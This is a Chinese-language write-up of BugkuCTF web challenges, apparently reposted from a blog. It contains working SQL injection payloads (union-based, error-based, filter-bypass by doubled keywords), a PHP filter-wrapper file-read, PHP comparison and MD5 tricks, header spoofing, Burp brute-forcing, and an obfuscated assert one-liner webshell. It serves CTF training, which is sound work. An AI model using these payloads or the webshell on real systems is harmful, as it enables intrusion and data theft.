bugkuctf-web(Writeup)


官方网站:https://ctf.bugku.com/



web2

题目:
http://123.206.87.240:8002/web2/

Writeup:

#查看页面源代码
ctrl + U
F12
view-source:

在这里插入图片描述

计算器

题目:
http://123.206.87.240:8002/yanzhengma/

Writeup:
正确答案是两位数字,maxlength限制了我们输入的字数,只允许输入1位。
在这里插入图片描述
由于前端代码在我们浏览器加载的,我们可以随意控制前端代码,修改maxlength大一些,再输入正确答案,即可获取flag。
在这里插入图片描述
在这里插入图片描述

web基础$_GET

题目:
http://123.206.87.240:8002/get/

Writeup:

$what=$_GET['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

以GET方式接收用户输入的内容,传输到$what变量中,如果$what等于’flag’,那么就会输出此题flag

扫描二维码关注公众号,回复: 12278786 查看本文章
http://123.206.87.240:8002/get/?what=flag

在这里插入图片描述


web基础$_POST

题目:
http://123.206.87.240:8002/post/

Writeup:

$what=$_POST['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

以POST方式接收用户输入的内容,传输到$what变量中,如果$what等于’flag’,那么就会输出此题flag

火狐插件安装一个hackbar或用burp进行发包,传输变量what=flag即可获得flag
在这里插入图片描述


矛盾

题目:
http://123.206.87.240:8002/get/index1.php

Writeup:

$num=$_GET['num'];
if(!is_numeric($num))
{
    
    
echo $num;
if($num==1)
echo 'flag{**********}';
}
  1. GET方式接收num变量传输的内容
  2. 第一个if判断,如果不是数字,执行代码块
  3. 第二个if判断,$num变量等于1
  4. 满足以上条件,输出flag

php比较时(松散比较==),会出现多种比较情况,详情查阅官方解说

举个例子:

执行以下php代码,会输出结果bool(true)


<?php
var_dump(123=='123asd');
?>

因为php在比较而且类型不同时,第一个值(123)会取下完整的结果,而第二个值(‘123asd’)则会将变成‘123’与第一个值相比 。

那么等式会转换成

var_dump(123==‘123’);

而数字与字符相比,内容相同将等于true:
在这里插入图片描述
这样一来我们就可以payload为:?num=1a

在这里插入图片描述

web3

题目:
flag就在这里快来找找吧
http://123.206.87.240:8002/web3/

Writeup:

打开题目后发现一直弹窗
在这里插入图片描述

ctrl+u查看页面源代码,滑倒最低可以看到一串html实体化编码

&#75;&#69;&#89;&#123;&#74;&#50;&#115;&#97;&#52;&#50;&#97;&#104;&#74;&#75;&#45;&#72;&#83;&#49;&#49;&#73;&#73;&#73;&#125;

在这里插入图片描述

解码网站:html在线解码网站


在这里插入图片描述

域名解析

题目:
听说把 flag.baidu.com 解析到123.206.87.240 就能拿到flag

Writeup:
访问123.206.87.240,利用burp拦截数据包,将host修改成flag.baidu.com
在这里插入图片描述
burp点击forward发放数据包后即可看到flag

在这里插入图片描述

你必须让他停下

题目:
地址:http://123.206.87.240:8002/web12/
作者:@berTrAM

Writeup:

访问后一直题目刷新,打开burp拦截抓包,将数据包发送到intrder模块,设置null payload发包。

在这里插入图片描述然后点击start attack开始爆破,然后就会发现一个数据长度不同的数据包,查看返回包即可看到flag

在这里插入图片描述
如果爆破一次没有发现flag,可以从新抓个数据包进行爆破。


本地包含

题目:
http://123.206.87.240:8003/

Writeup:
题目访问不了


变量1

题目:
http://123.206.87.240:8004/index1.php

Writeup:

<?php  

error_reporting(0);#关闭错误报告
include "flag1.php";#包含flag1.php文件
highlight_file(__file__);#高亮显示代码
if(isset($_GET['args'])){
    
    #isset判断变量是否为空,如果不为空,即执行以下代码块。
    $args = $_GET['args'];#以GET方式传输数据,赋值于$args变量
    if(!preg_match("/^\w+$/",$args)){
    
    #正则表达式,如果没有匹配到相应的字符,则执行以下代码块
        die("args error!");#退出php脚本
    }
    eval("var_dump($$args);");#eval() 函数把字符串按照 PHP 代码来计算。var_dump为打印括号内变量的类型。
}
?>

正则匹配规则:
/ :字符串前后都有两个反斜杠,类似与标识符
^ :匹配字符串的行首
\w :表示的是匹配包括下划线的任何单词字符。类似但不等价于"[A-Za-z0-9_]"
+:匹配多个
$ : 表达式结尾

$$:php中两个$$用来定义可变变量。
$args传入的内容将会变成一个变量。

例如:

<?php
$bb = '1';
$aa="bb";
print $$aa;
?>

结果: 1

如何读取flag呢?下面我们来介绍以下$GLOBALS:
$GLOBALS 是PHP 中的预定义超全局数组,包含了当前代码中的所有的变量。

payload:

http://123.206.87.240:8004/index1.php?args=GLOBALS

在这里插入图片描述

web5

题目:
JSPFUCK???答案格式CTF{**}
http://123.206.87.240:8002/web5/
字母大写

Writeup:

查看源代码,发现大量的js加密编码
在这里插入图片描述
复制到控制台,可以看见下方打印出第一个flag:ctf{whatfk}
在这里插入图片描述
转换成大写提交:

在这里插入图片描述


头等舱

题目:
http://123.206.87.240:9009/hd.php

Writeup:

提示头等舱,说明flag在可能在响应头。利用burp抓取数据包,发送到repeater看响应包。
在这里插入图片描述

网站被黑

题目:
http://123.206.87.240:8002/webshell/
这个题没技术含量但是实战中经常遇到

Writeup:

思路就是扫描黑页,然后爆破webshell密码

随意选择个漏扫工具,找个webshell字典去扫描,可以发现webshell目录下存在个shell.php
在这里插入图片描述
打开后发现个登录口
在这里插入图片描述
burp抓包,发送到intruder去爆破
在这里插入图片描述
选择shellpassword字典去爆破
在这里插入图片描述
爆破出密码为hack,并且返回包存在flag
在这里插入图片描述


管理员系统

题目:
http://123.206.31.85:1003/
flag格式flag{}

Writeup:
查看页面源代码,发现一串base64编码

dGVzdDEyMw==

在这里插入图片描述
base64在线解码网站

解码后得到明文:test123

在这里插入图片描述
题目提示管理员系统,应该有个admin用户,账号密码均为admin/test123。提交后提示ip禁止访问。

在这里插入图片描述
火狐安装插件X-Forwarded-For Header,修改地址为127.0.0.1
在这里插入图片描述
再次提交账号密码,即可显示flag

在这里插入图片描述


web4

题目:

看看源代码吧
http://123.206.87.240:8002/web4/

Writeup:

查看源代码,发现一段url编码后的代码。
在这里插入图片描述
可以发现eval,教大家一个小技巧,在做web题时一般eval是执行不了的,将eval修改成alert,发送到控制台执行。可以看到一串字符串。

67d709b2b54aa2aa648cf6e87a7114f1

在这里插入图片描述
将字符串提交,即可获取flag

在这里插入图片描述

flag在index里

题目:
http://123.206.87.240:8005/post/

Writeup:

在这里插入图片描述
点击click me? no 后,可以看到url出现?file=show.php,一般这类题就是文件包含题。利用php伪协议读取index.php文件里的内容

payload:

http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

将base64带到burp进行解码,即可获取flag:

在这里插入图片描述

输入密码查看flag

题目:
http://123.206.87.240:8002/baopo/
作者:Se7en

Writeup:

打开题目,提示输入5位数密码,可以知道是爆破题。
在这里插入图片描述

利用burp抓包,发送到intruder模块,标记密码
在这里插入图片描述

设置爆破规则,选择字典爆破
在这里插入图片描述

可以看到有一个字节长度不同的返回包,响应包可以看到flag
在这里插入图片描述


点击一百万次

题目:
http://123.206.87.240:9001/test/

Writeup:
题目访问不了


备份是个好习惯

题目:
http://123.206.87.240:8002/web16/
听说备份是个好习惯

Writeup:
题目提示备份文件,访问index.php.bak

http://123.206.87.240:8002/web16/index.php.bak

在这里插入图片描述
下载后获得以下代码:

<?php
/**
 * Created by PhpStorm.
 * User: Norse
 * Date: 2017/8/6
 * Time: 20:22
*/

include_once "flag.php"; #包含flag.php文件
ini_set("display_errors", 0);#取消错误信息提示
$str = strstr($_SERVER['REQUEST_URI'], '?');#截取url中?开始到结尾的字符
$str = substr($str,1);#php代码以0来表示第一位,说明将问号后面的字符传入str变量中
$str = str_replace('key','',$str);#将str变量中的key字符串替换成空
parse_str($str);#把查询字符串解析到变量中
echo md5($key1);#输出$key1的MD5值

echo md5($key2);#输出$key2的MD5值
if(md5($key1) == md5($key2) && $key1 !== $key2){
    
    #两个变量MD5值相等,并且两个变量的字符串内容不能相等
    echo $flag."取得flag";
}
?>

1.key被替换成空,所以我们使用双写绕过
2.php松散比较绕过,可以百度寻找MD5碰撞,寻找两个变量加密成MD5后比较为ture的值

payload:

kekeyy1=s878926199a&kekeyy2=s155964671a

在这里插入图片描述


成绩单

题目:
快来查查成绩吧
http://123.206.87.240:8002/chengjidan/

Writeup:
sql注入题

#页面正常
1' and 1=1#

在这里插入图片描述

#页面异常
1' and 1=2#

在这里插入图片描述

#order by 测试发现有4个字段
1' order by 4#

#显位
1' and 1=2 union select 1,2,3,4#

在这里插入图片描述

#查看当前数据库下的所有表名
1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()#

#查询fl4g表下的所有字段名
1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='fl4g'#

#查询表中的数据内容
1' and 1=2 union select 1,group_concat(skctf_flag),3,4 from fl4g#

在这里插入图片描述


秋名山老司机

题目:
http://123.206.87.240:8002/qiumingshan/
是不是老司机试试就知道。

Writeup:
口算是算不了那么快的
在这里插入图片描述
思路就是利用payload爬取当前页面信息,然后相加再提交到服务器。

import requests,base64

url="http://123.206.87.240:8002/web6/"
data="margin"
s=requests.Session()
r1 = s.get(url=url)
flag = base64.b64decode(r1.headers['flag']).split(":")[1].strip(" ")
flag1 = base64.b64decode(flag)
r2 = s.post(url=url,data={
    
    data:flag1})
print r2.text

在这里插入图片描述


速度要快

题目:
速度要快!!!!!!
http://123.206.87.240:8002/web6/
格式KEY{xxxxxxxxxxxxxx}

Writeup:
打开题目后,burp抓包,发送到Repeater模块,可以看到相应包出现一个flag字段的响应头
在这里插入图片描述
解码后:
在这里插入图片描述

当我们再次点击go后发现flag又改变了
在这里插入图片描述
说明需要我们获取到相应字符串,立刻提交到服务器上,与上一题一样

import requests,base64  

url = 'http://123.206.87.240:8002/web6/'
request = requests.session()
flag =base64.b64decode(request.get(url).headers['flag'])
key = base64.b64decode(flag[flag.find(':')+2:])

flag = request.post(url,{
    
    'margin': key}).content

print flag

cookies欺骗

题目:
速度要快!!!!!!
http://123.206.87.240:8002/web11/
格式KEY{xxxxxxxxxxxxxx}

Writeup:
查看题目,在url上发现一个base64加密字符
在这里插入图片描述
解码后可以看到是keys.txt

在这里插入图片描述

然后我们将index.php编译成base64编码,载入到url中

aW5kZXgucGhw

在这里插入图片描述
查看页面源代码可以看到一个<?php,那么可以知道url上的line参数代表查询的行数。

在这里插入图片描述
利用burp爆破行数
在这里插入图片描述
组合成以下代码:

<?php
error_reporting(0);#屏蔽报错
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");#GET方式获取变量filename,然后进行base64解密,传入$file变量
$line=isset($_GET['line'])?intval($_GET['line']):0;#判断line变量是否存在,如果不存在则line为0
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");#如果file变量为空,则跳转index.php?line=&filename=a2V5cy50eHQ=
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);#定义file_list数组

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
    
    #如果存在cookie变量margin,且margin的值为margin,则file_list数组列表增加keys.php
$file_list[2]='keys.php';
}

if(in_array($file, $file_list)){
    
    
$fa = file($file);
echo $fa[$line];
}
?>

分析好代码后知道,增加cookie:margin=margin即可读取keys.php

payload:

http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy5waHA=

在这里插入图片描述

查看页面源代码,可以看到flag
在这里插入图片描述

never give up

题目:
http://123.206.87.240:8006/test/hello.php
作者:御结冰城

Writeup:

进入题目后查看源代码,发现注释
在这里插入图片描述
访问后直接强制跳转到bugkuctf官方
在这里插入图片描述
重新访问一次,用burp抓包,发送到repeater模块进行发包
在这里插入图片描述
可以看到一大串编译过的代码,url解码后发现一大串base64编码
在这里插入图片描述
base64解码后再url解码,可以看到一个flag文件
在这里插入图片描述
访问flag文件即可获取flag

f4l2a3g.txt

在这里插入图片描述

welcome to bugkuctf

题目:
http://123.206.87.240:8006/test1/
作者:pupil

Writeup:
访问后出现404


过狗一句话

题目:
http://123.206.87.240:8010/

送给大家一个过狗一句话

<?php 
$poc="a#s#s#e#r#t";
 $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>

Writeup:
害 题目遭到了破坏
在这里插入图片描述

字符?正则?

题目:
字符?正则?
http://123.206.87.240:8002/web10/

Writeup:

 <?php 
highlight_file('2.php');
$key='KEY{********************************}';
$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
if( $IM ){
    
     
  die('key is: '.$key);
}
?> 

匹配规则:

/:标示着正则的开始与结束
.:任意字符
*:匹配任意次
{4,7}:匹配4到7个相同字符
\/:转译成反斜杠
():合并整体匹配
[a-z] :匹配任意小写英文字母
[[:punct:]]:匹配任何标点符号

payload:

keyakeyaaaaakey:/a/aaakeya!

在这里插入图片描述

前女友(SKCTF)

题目:
http://123.206.31.85:49162/
flag格式:SKCTF{xxxxxxxxxxxxxxxxxx}

Writeup:
题目打不开了

login1(SKCTF)

题目:
http://123.206.31.85:49163/
flag格式:SKCTF{xxxxxxxxxxxxxxxxx}
hint:SQL约束攻击

Writeup:
题目打不开了


你从哪里来

题目:
http://123.206.87.240:9009/from.php

Writeup:

burp抓包,增加:Referer: https://www.google.com
题目打不开了

md5 collision(NUPT_CTF)

题目:
http://123.206.87.240:9009/md5.php

Writeup:

可以百度以下MD5碰撞,其实MD5碰撞和php松散比较有关,大家都可以详细了解一下

http://123.206.87.240:9009/md5.php?a=s878926199a

在这里插入图片描述

程序员本地网站

题目:
http://123.206.87.240:8002/localhost/
请从本地访问

Writeup:
利用X-Forwarded-For Header插件修改ip成127.0.0.1即可

在这里插入图片描述

各种绕过

题目:
各种绕过哟
http://123.206.87.240:8002/web7/

Writeup:

 <?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);#id变量url解码
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    
    #GET传输uname变量,#POST传输passwd变量
    if ($_GET['uname'] == $_POST['passwd'])
#如果uname等于passwd,将打印以下字符串。
        print 'passwd can not be uname.';

    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))
#如果uname与passwd相等,并且两个变量的sha1加密字符串不相等,则打印flag
        die('Flag: '.$flag);

    else

        print 'sorry!';

}
?> 

将uname和passwd变成数组,然后传入不同的内容,这样一来,数组不能进行sha1加密,导致sha1一样,而且他们的变量内容也不一样。

payload:

http://123.206.87.240:8002/web7/?id=margin&uname[]=1

post:
passwd[]=2

在这里插入图片描述

web8

题目:
txt????
http://123.206.87.240:8002/web8/

Writeup:

<?php
extract($_GET);#extract() 函数从数组中将变量导入到当前的符号表。该函数使用数组键名作为变量名,使用数组键值作为变量值。
if (!empty($ac))#检查$ac变量是否为空
{
    
    
$f = trim(file_get_contents($fn));#把整个文件读入$fn字符串中
if ($ac === $f)#如果$ac等于$f即可获取flag
{
    
    
echo "<p>This is flag:" ." $flag</p>";
}
else
{
    
    
echo "<p>sorry!</p>";
}
}
?>

1.extract可以赋值变量,我们可以自己创建$ac,fn变量
2.file_get_contents可以配合php://input写入内容,传输到$f中

payload:

http://123.206.87.240:8002/web8/?ac=flag&fn=php://input

在这里插入图片描述

细心

题目:
地址:http://123.206.87.240:8002/web13/
想办法变成admin

Writeup:
访问后出现404,人很懵,后来看题目,要细心。
在这里插入图片描述
访问robots.txt,发现一个 文件resusl.php
在这里插入图片描述
左下方有个提示,估计盲猜密码是admin
在这里插入图片描述
记得设置X-Forwarded-For Header

http://123.206.87.240:8002/web13/resusl.php?x=admin

在这里插入图片描述

求getshell

题目:
求getshell
http://123.206.87.240:8002/web9/

Writeup:

  1. 把请求头里面的Content-Type字母改成大写进行绕过
  2. 文件后缀名php5绕过

在这里插入图片描述

INSERT INTO注入

题目:
地址:http://123.206.87.240:8002/web15/

flag格式:flag{xxxxxxxxxxxx}
不如写个Python吧

error_reporting(0);

function getIp(){
    
    
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
    
    
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
    
    
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

Writeup:

没做出,看了网上很多Writeup是在ip中注入,而且代码的确存在注入。
但尝试了很多payload都没成功,而且sleep函数也没有生效,如果哪位大佬做出来了,望评论区留个wp地址。
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述


这是一个神奇的登陆框

题目:
http://123.206.87.240:9001/sql/
flag格式flag{}

Writeup:
题目404

多次

题目:
http://123.206.87.240:9004

本题有2个flag
flag均为小写
flag格式 flag{}

Writeup:
id=5的时候提示可以在这里注入
在这里插入图片描述
发现and,or等字符被替换成空格,可以双写绕过。

#页面返回正常
http://123.206.87.240:9004/1ndex.php?id=5' anandd 1=1%23

在这里插入图片描述

#页面返回错误
http://123.206.87.240:9004/1ndex.php?id=5' anandd 1=2%23

在这里插入图片描述

#查询字段数
http://123.206.87.240:9004/1ndex.php?id=5' oorrder by 2%23

#显位
http://123.206.87.240:9004/1ndex.php?id=-5' uniunionon selselectect 1,2%23

#查询当前数据库下的表,注意information中间有个or,需要双写绕过
http://123.206.87.240:9004/1ndex.php?id=-5' uniunionon selselectect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()%23

#查询当前表中的字段flag1 : flag1,address
http://123.206.87.240:9004/1ndex.php?id=-5' uniunionon selselectect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name='flag1'%23

#查询flag1字段内容
http://123.206.87.240:9004/1ndex.php?id=-5' uniunionon selselectect 1,group_concat(flag1) from flag1%23

得出flag1:usOwycTju+FTUUzXosjr
在这里插入图片描述
查询下一个地址:

http://123.206.87.240:9004/1ndex.php?id=-5%27%20uniunionon%20selselectect%201,group_concat(address)%20from%20flag1%23

在这里插入图片描述
下一关输入单引号的时候提示报错,可以看出是报错注入:

http://123.206.87.240:9004/Once_More.php?id=1'

在这里插入图片描述

#查询当前数据库下的表
http://123.206.87.240:9004/Once_More.php?id=1' and updatexml(1,(concat(0x7c,(select group_concat(table_name) from information_schema.tables where table_schema=database()))),1)%23

#查询当前flag2表下的字段
http://123.206.87.240:9004/Once_More.php?id=1' and updatexml(1,(concat(0x7c,(select group_concat(column_name) from information_schema.columns where table_name='flag2'))),1)%23

#查询flag2字段中的内容
http://123.206.87.240:9004/Once_More.php?id=1' and updatexml(1,(concat(0x7c,(select group_concat(flag2) from flag2))),1)%23

在这里插入图片描述
查询到内容为:flag{Bugku-sql_6s-2i-4t-bug}

提交flag时记得小写


PHP_encrypt_1(ISCCCTF)

题目:
fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=

https://ctf.bugku.com/files/6b8e8eb682d757d851cd5dcdca349668/PHP_encrypt_1.zip

Writeup:

https://blog.csdn.net/weixin_41924764/article/details/109404236


文件包含2

题目:
http://123.206.31.85:49166/
flag格式:SKCTF{xxxxxxxxxxxxxxxx}
hint:文件包含

Writeup:
题目已打不开

flag.php

题目:
地址:http://123.206.87.240:8002/flagphp/
点了login咋没反应
提示:hint

Writeup:

login点不了,题目提示hint。GET传输hint变量,提交任意字符过去,发现页面变化了。

http://123.206.87.240:8002/flagphp/index.php?hint=1

在这里插入图片描述

 <?php
error_reporting(0);
include_once("flag.php");
$cookie = $_COOKIE['ISecer'];#接收cookie变量ISecer
if(isset($_GET['hint'])){
    
    #判断是否存在hint变量,如果存在显示当前代码
    show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")#序列化$cookie等于$key变量,则输入flag
{
    
       #这里有个小坑,key变量在最后才被定义,其实在前面还没有被定义的
    echo "$flag";
}
else {
    
    
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login</title>
<link rel="stylesheet" href="admin.css" type="text/css">
</head>
<body>
<br>
<div class="container" align="center">
  <form method="POST" action="#">
    <p><input name="user" type="text" placeholder="Username"></p>
    <p><input name="password" type="password" placeholder="Password"></p>
    <p><input value="Login" type="button"/></p>
  </form>
</div>
</body>
</html>

<?php
}
$KEY='ISecer:www.isecer.com';
?> 

利用burp发送

payload:

Cookie: ISecer=s:0:"";

在这里插入图片描述


sql注入2

题目:
http://123.206.87.240:8007/web2/
全都tm过滤了绝望吗?
提示 !,!=,=,+,-,^,%

Writeup:
.DS_Store泄露

利用工具:
https://github.com/lijiejie/ds_store_exp

在这里插入图片描述
直接访问http://123.206.87.240:8007/web2/flag文件获取flag

孙xx的博客

题目:
http://123.206.87.240:2014
需要用到渗透测试第一步信息收集

Writeup:

看了别的大佬做题,是先从近期文章发现flag提示,然后目录扫描到phpmyadmin,但我尝试访问的时候访问不到了 估计被人删了。


Trim的日记本

题目:
http://123.206.87.240:9002/
hints:不要一次就放弃

Writeup:
目录扫描:
在这里插入图片描述
页面直接显示flag

在这里插入图片描述


login2(SKCTF)

题目:
http://123.206.31.85:49165/
SKCTF{xxxxxxxxxxxxxxxxxxxxx}
hint:union,命令执行

Writeup:

题目已经打不开了

login3(SKCTF)

题目:
http://123.206.31.85:49167/
flag格式:SKCTF{xxxxxxxxxxxxx}
hint:基于布尔的SQL盲注

Writeup:

题目打不开了

文件上传2(湖湘杯)

题目:
http://123.206.87.240:9011/

Writeup:

题目打不开了


江湖魔头

题目:
http://123.206.31.85:1616/
学会如来神掌应该就能打败他了吧

Writeup:

https://blog.csdn.net/weixin_41924764/article/details/109488408

login4

题目:
http://123.206.31.85:49168/
flag格式:SKCTF{xxxxxxxxxxxxxxxx}
hint:CBC字节翻转攻击

Writeup:

题目打不开了

猜你喜欢

转载自blog.csdn.net/weixin_41924764/article/details/108280968